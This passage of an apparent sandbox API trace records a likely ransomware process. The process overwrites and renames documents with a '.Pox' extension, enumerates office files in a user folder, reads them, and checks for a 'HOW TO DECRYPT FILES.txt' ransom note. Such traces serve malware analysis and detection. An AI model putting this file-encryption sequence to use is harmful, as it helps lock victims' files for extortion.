out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx", lpFilePart=0x0) returned 0x4d [0039.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0039.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\yffkdc845c6.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.719] GetFileType (hFile=0x26c) returned 0x1 [0039.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0039.719] GetFileType (hFile=0x26c) returned 0x1 [0039.719] WriteFile (in: hFile=0x26c, lpBuffer=0x35f0998*, nNumberOfBytesToWrite=0x17500, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x35f0998*, lpNumberOfBytesWritten=0x3ae4f0*=0x17500, lpOverlapped=0x0) returned 1 [0039.721] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx", lpFilePart=0x0) returned 0x4d [0039.733] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx.Pox", lpFilePart=0x0) returned 0x51 [0039.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0039.733] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\yffkdc845c6.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc44a9210, ftCreationTime.dwHighDateTime=0x1d4d548, ftLastAccessTime.dwLowDateTime=0x1d579390, ftLastAccessTime.dwHighDateTime=0x1d4ceb8, ftLastWriteTime.dwLowDateTime=0x29dabca0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x17500)) returned 1 [0039.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0039.733] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\yffkdc845c6.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\yfFKDC845C6.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\yffkdc845c6.pptx.pox")) returned 1 [0039.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0039.734] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6", lpFilePart=0x0) returned 0x47 [0039.734] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\", lpFilePart=0x0) returned 0x48 [0039.734] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb95368d0, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0xe47228d0, ftLastAccessTime.dwHighDateTime=0x1d4cb86, ftLastWriteTime.dwLowDateTime=0xe47228d0, ftLastWriteTime.dwHighDateTime=0x1d4cb86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406008 [0039.734] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb95368d0, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0xe47228d0, ftLastAccessTime.dwHighDateTime=0x1d4cb86, ftLastWriteTime.dwLowDateTime=0xe47228d0, ftLastWriteTime.dwHighDateTime=0x1d4cb86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.734] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91315cd0, ftCreationTime.dwHighDateTime=0x1d4d041, ftLastAccessTime.dwLowDateTime=0xd9396cb0, ftLastAccessTime.dwHighDateTime=0x1d4c6b0, ftLastWriteTime.dwLowDateTime=0xd9396cb0, ftLastWriteTime.dwHighDateTime=0x1d4c6b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="1OSFGjl0nYx-M.pptx", cAlternateFileName="1OSFGJ~1.PPT")) returned 1 [0039.734] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3f6740, ftCreationTime.dwHighDateTime=0x1d4d4bc, ftLastAccessTime.dwLowDateTime=0x92dccad0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0x92dccad0, ftLastWriteTime.dwHighDateTime=0x1d4ce3c, nFileSizeHigh=0x0, nFileSizeLow=0xe40f, dwReserved0=0x0, dwReserved1=0x0, cFileName="2OYFkWprG4a574w2dLu.xls", cAlternateFileName="2OYFKW~1.XLS")) returned 1 [0039.735] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd84469b0, ftCreationTime.dwHighDateTime=0x1d4d527, ftLastAccessTime.dwLowDateTime=0xb694bcb0, ftLastAccessTime.dwHighDateTime=0x1d4cfdd, ftLastWriteTime.dwLowDateTime=0xb694bcb0, ftLastWriteTime.dwHighDateTime=0x1d4cfdd, nFileSizeHigh=0x0, nFileSizeLow=0x17948, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hfaAXLRMbakfPHYNwEQ.ppt", cAlternateFileName="5HFAAX~1.PPT")) returned 1 [0039.735] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63afb810, ftCreationTime.dwHighDateTime=0x1d4c76d, ftLastAccessTime.dwLowDateTime=0xa178a910, ftLastAccessTime.dwHighDateTime=0x1d4d1a7, ftLastWriteTime.dwLowDateTime=0xa178a910, ftLastWriteTime.dwHighDateTime=0x1d4d1a7, nFileSizeHigh=0x0, nFileSizeLow=0x14476, dwReserved0=0x0, dwReserved1=0x0, cFileName="a7GX aY3PrENfhv83.pps", cAlternateFileName="A7GXAY~1.PPS")) returned 1 [0039.735] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f01770, ftCreationTime.dwHighDateTime=0x1d4cd73, ftLastAccessTime.dwLowDateTime=0x28d0b150, ftLastAccessTime.dwHighDateTime=0x1d4cbbd, ftLastWriteTime.dwLowDateTime=0x28d0b150, ftLastWriteTime.dwHighDateTime=0x1d4cbbd, nFileSizeHigh=0x0, nFileSizeLow=0xe523, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrOtm1_fzIMEnAQWf.doc", cAlternateFileName="CROTM1~1.DOC")) returned 1 [0039.735] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41219f0, ftCreationTime.dwHighDateTime=0x1d4d0ae, ftLastAccessTime.dwLowDateTime=0xa24c7350, ftLastAccessTime.dwHighDateTime=0x1d4d556, ftLastWriteTime.dwLowDateTime=0xa24c7350, ftLastWriteTime.dwHighDateTime=0x1d4d556, nFileSizeHigh=0x0, nFileSizeLow=0x15c9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="e5 uvmMI3me7.pptx", cAlternateFileName="E5UVMM~1.PPT")) returned 1 [0039.735] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3b64aa0, ftCreationTime.dwHighDateTime=0x1d4cc7d, ftLastAccessTime.dwLowDateTime=0x17fcc270, ftLastAccessTime.dwHighDateTime=0x1d4d38c, ftLastWriteTime.dwLowDateTime=0x17fcc270, ftLastWriteTime.dwHighDateTime=0x1d4d38c, nFileSizeHigh=0x0, nFileSizeLow=0x136b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="lC2WFP1.xlsx", cAlternateFileName="LC2WFP~1.XLS")) returned 1 [0039.735] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc147590, ftCreationTime.dwHighDateTime=0x1d4d556, ftLastAccessTime.dwLowDateTime=0xb277e20, ftLastAccessTime.dwHighDateTime=0x1d4c683, ftLastWriteTime.dwLowDateTime=0xb277e20, ftLastWriteTime.dwHighDateTime=0x1d4c683, nFileSizeHigh=0x0, nFileSizeLow=0xe5e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="OJrh2t9nE.pdf", cAlternateFileName="OJRH2T~1.PDF")) returned 1 [0039.735] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x411846c0, ftCreationTime.dwHighDateTime=0x1d4d2c4, ftLastAccessTime.dwLowDateTime=0xe561a9c0, ftLastAccessTime.dwHighDateTime=0x1d4c724, ftLastWriteTime.dwLowDateTime=0xe561a9c0, ftLastWriteTime.dwHighDateTime=0x1d4c724, nFileSizeHigh=0x0, nFileSizeLow=0x3419, dwReserved0=0x0, dwReserved1=0x0, cFileName="PthlTMNUNtM.xlsx", cAlternateFileName="PTHLTM~1.XLS")) returned 1 [0039.736] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb43ce6a0, ftCreationTime.dwHighDateTime=0x1d4d496, ftLastAccessTime.dwLowDateTime=0xd730bda0, ftLastAccessTime.dwHighDateTime=0x1d4c9e0, ftLastWriteTime.dwLowDateTime=0xd730bda0, ftLastWriteTime.dwHighDateTime=0x1d4c9e0, nFileSizeHigh=0x0, nFileSizeLow=0x1ea4, dwReserved0=0x0, dwReserved1=0x0, cFileName="pVp5OaSgtD.ots", cAlternateFileName="PVP5OA~1.OTS")) returned 1 [0039.736] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28584980, ftCreationTime.dwHighDateTime=0x1d4cd1c, ftLastAccessTime.dwLowDateTime=0xded30de0, ftLastAccessTime.dwHighDateTime=0x1d4c5f5, ftLastWriteTime.dwLowDateTime=0xded30de0, ftLastWriteTime.dwHighDateTime=0x1d4c5f5, nFileSizeHigh=0x0, nFileSizeLow=0x61ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="TUjNEjAe GTq.rtf", cAlternateFileName="TUJNEJ~1.RTF")) returned 1 [0039.736] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b1e950, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x56c3a320, ftLastAccessTime.dwHighDateTime=0x1d4d50d, ftLastWriteTime.dwLowDateTime=0x56c3a320, ftLastWriteTime.dwHighDateTime=0x1d4d50d, nFileSizeHigh=0x0, nFileSizeLow=0x518f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wtfOidnhEd_h7Scw.rtf", cAlternateFileName="WTFOID~1.RTF")) returned 1 [0039.736] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.736] FindClose (in: hFindFile=0x406008 | out: hFindFile=0x406008) returned 1 [0039.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0039.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0039.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0039.736] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6", lpFilePart=0x0) returned 0x47 [0039.737] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\", lpFilePart=0x0) returned 0x48 [0039.737] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb95368d0, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0xe47228d0, ftLastAccessTime.dwHighDateTime=0x1d4cb86, ftLastWriteTime.dwLowDateTime=0xe47228d0, ftLastWriteTime.dwHighDateTime=0x1d4cb86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406008 [0039.737] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb95368d0, ftCreationTime.dwHighDateTime=0x1d4ce6f, ftLastAccessTime.dwLowDateTime=0xe47228d0, ftLastAccessTime.dwHighDateTime=0x1d4cb86, ftLastWriteTime.dwLowDateTime=0xe47228d0, ftLastWriteTime.dwHighDateTime=0x1d4cb86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.737] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91315cd0, ftCreationTime.dwHighDateTime=0x1d4d041, ftLastAccessTime.dwLowDateTime=0xd9396cb0, ftLastAccessTime.dwHighDateTime=0x1d4c6b0, ftLastWriteTime.dwLowDateTime=0xd9396cb0, ftLastWriteTime.dwHighDateTime=0x1d4c6b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdf6, dwReserved0=0x0, dwReserved1=0x0, cFileName="1OSFGjl0nYx-M.pptx", cAlternateFileName="1OSFGJ~1.PPT")) returned 1 [0039.737] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3f6740, ftCreationTime.dwHighDateTime=0x1d4d4bc, ftLastAccessTime.dwLowDateTime=0x92dccad0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0x92dccad0, ftLastWriteTime.dwHighDateTime=0x1d4ce3c, nFileSizeHigh=0x0, nFileSizeLow=0xe40f, dwReserved0=0x0, dwReserved1=0x0, cFileName="2OYFkWprG4a574w2dLu.xls", cAlternateFileName="2OYFKW~1.XLS")) returned 1 [0039.738] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd84469b0, ftCreationTime.dwHighDateTime=0x1d4d527, ftLastAccessTime.dwLowDateTime=0xb694bcb0, ftLastAccessTime.dwHighDateTime=0x1d4cfdd, ftLastWriteTime.dwLowDateTime=0xb694bcb0, ftLastWriteTime.dwHighDateTime=0x1d4cfdd, nFileSizeHigh=0x0, nFileSizeLow=0x17948, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hfaAXLRMbakfPHYNwEQ.ppt", cAlternateFileName="5HFAAX~1.PPT")) returned 1 [0039.738] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63afb810, ftCreationTime.dwHighDateTime=0x1d4c76d, ftLastAccessTime.dwLowDateTime=0xa178a910, ftLastAccessTime.dwHighDateTime=0x1d4d1a7, ftLastWriteTime.dwLowDateTime=0xa178a910, ftLastWriteTime.dwHighDateTime=0x1d4d1a7, nFileSizeHigh=0x0, nFileSizeLow=0x14476, dwReserved0=0x0, dwReserved1=0x0, cFileName="a7GX aY3PrENfhv83.pps", cAlternateFileName="A7GXAY~1.PPS")) returned 1 [0039.738] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f01770, ftCreationTime.dwHighDateTime=0x1d4cd73, ftLastAccessTime.dwLowDateTime=0x28d0b150, ftLastAccessTime.dwHighDateTime=0x1d4cbbd, ftLastWriteTime.dwLowDateTime=0x28d0b150, ftLastWriteTime.dwHighDateTime=0x1d4cbbd, nFileSizeHigh=0x0, nFileSizeLow=0xe523, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrOtm1_fzIMEnAQWf.doc", cAlternateFileName="CROTM1~1.DOC")) returned 1 [0039.738] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41219f0, ftCreationTime.dwHighDateTime=0x1d4d0ae, ftLastAccessTime.dwLowDateTime=0xa24c7350, ftLastAccessTime.dwHighDateTime=0x1d4d556, ftLastWriteTime.dwLowDateTime=0xa24c7350, ftLastWriteTime.dwHighDateTime=0x1d4d556, nFileSizeHigh=0x0, nFileSizeLow=0x15c9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="e5 uvmMI3me7.pptx", cAlternateFileName="E5UVMM~1.PPT")) returned 1 [0039.739] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3b64aa0, ftCreationTime.dwHighDateTime=0x1d4cc7d, ftLastAccessTime.dwLowDateTime=0x17fcc270, ftLastAccessTime.dwHighDateTime=0x1d4d38c, ftLastWriteTime.dwLowDateTime=0x17fcc270, ftLastWriteTime.dwHighDateTime=0x1d4d38c, nFileSizeHigh=0x0, nFileSizeLow=0x136b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="lC2WFP1.xlsx", cAlternateFileName="LC2WFP~1.XLS")) returned 1 [0039.739] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc147590, ftCreationTime.dwHighDateTime=0x1d4d556, ftLastAccessTime.dwLowDateTime=0xb277e20, ftLastAccessTime.dwHighDateTime=0x1d4c683, ftLastWriteTime.dwLowDateTime=0xb277e20, ftLastWriteTime.dwHighDateTime=0x1d4c683, nFileSizeHigh=0x0, nFileSizeLow=0xe5e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="OJrh2t9nE.pdf", cAlternateFileName="OJRH2T~1.PDF")) returned 1 [0039.739] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x411846c0, ftCreationTime.dwHighDateTime=0x1d4d2c4, ftLastAccessTime.dwLowDateTime=0xe561a9c0, ftLastAccessTime.dwHighDateTime=0x1d4c724, ftLastWriteTime.dwLowDateTime=0xe561a9c0, ftLastWriteTime.dwHighDateTime=0x1d4c724, nFileSizeHigh=0x0, nFileSizeLow=0x3419, dwReserved0=0x0, dwReserved1=0x0, cFileName="PthlTMNUNtM.xlsx", cAlternateFileName="PTHLTM~1.XLS")) returned 1 [0039.739] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb43ce6a0, ftCreationTime.dwHighDateTime=0x1d4d496, ftLastAccessTime.dwLowDateTime=0xd730bda0, ftLastAccessTime.dwHighDateTime=0x1d4c9e0, ftLastWriteTime.dwLowDateTime=0xd730bda0, ftLastWriteTime.dwHighDateTime=0x1d4c9e0, nFileSizeHigh=0x0, nFileSizeLow=0x1ea4, dwReserved0=0x0, dwReserved1=0x0, cFileName="pVp5OaSgtD.ots", cAlternateFileName="PVP5OA~1.OTS")) returned 1 [0039.739] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28584980, ftCreationTime.dwHighDateTime=0x1d4cd1c, ftLastAccessTime.dwLowDateTime=0xded30de0, ftLastAccessTime.dwHighDateTime=0x1d4c5f5, ftLastWriteTime.dwLowDateTime=0xded30de0, ftLastWriteTime.dwHighDateTime=0x1d4c5f5, nFileSizeHigh=0x0, nFileSizeLow=0x61ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="TUjNEjAe GTq.rtf", cAlternateFileName="TUJNEJ~1.RTF")) returned 1 [0039.740] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b1e950, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x56c3a320, ftLastAccessTime.dwHighDateTime=0x1d4d50d, ftLastWriteTime.dwLowDateTime=0x56c3a320, ftLastWriteTime.dwHighDateTime=0x1d4d50d, nFileSizeHigh=0x0, nFileSizeLow=0x518f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wtfOidnhEd_h7Scw.rtf", cAlternateFileName="WTFOID~1.RTF")) returned 1 [0039.740] FindNextFileW (in: hFindFile=0x406008, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1b1e950, ftCreationTime.dwHighDateTime=0x1d4cee0, ftLastAccessTime.dwLowDateTime=0x56c3a320, ftLastAccessTime.dwHighDateTime=0x1d4d50d, ftLastWriteTime.dwLowDateTime=0x56c3a320, ftLastWriteTime.dwHighDateTime=0x1d4d50d, nFileSizeHigh=0x0, nFileSizeLow=0x518f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wtfOidnhEd_h7Scw.rtf", cAlternateFileName="WTFOID~1.RTF")) returned 0 [0039.740] FindClose (in: hFindFile=0x406008 | out: hFindFile=0x406008) returned 1 [0039.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0039.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0039.740] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx", lpFilePart=0x0) returned 0x5a [0039.740] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\1osfgjl0nyx-m.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.740] GetFileType (hFile=0x26c) returned 0x1 [0039.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.741] GetFileType (hFile=0x26c) returned 0x1 [0039.741] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0xcdf6 [0039.741] ReadFile (in: hFile=0x26c, lpBuffer=0x256cbbc, nNumberOfBytesToRead=0xcdf6, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x256cbbc*, lpNumberOfBytesRead=0x3ae488*=0xcdf6, lpOverlapped=0x0) returned 1 [0039.742] CloseHandle (hObject=0x26c) returned 1 [0039.767] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0039.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0039.768] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx", nBufferLength=0x105, lpBuffer=0x3adecc, 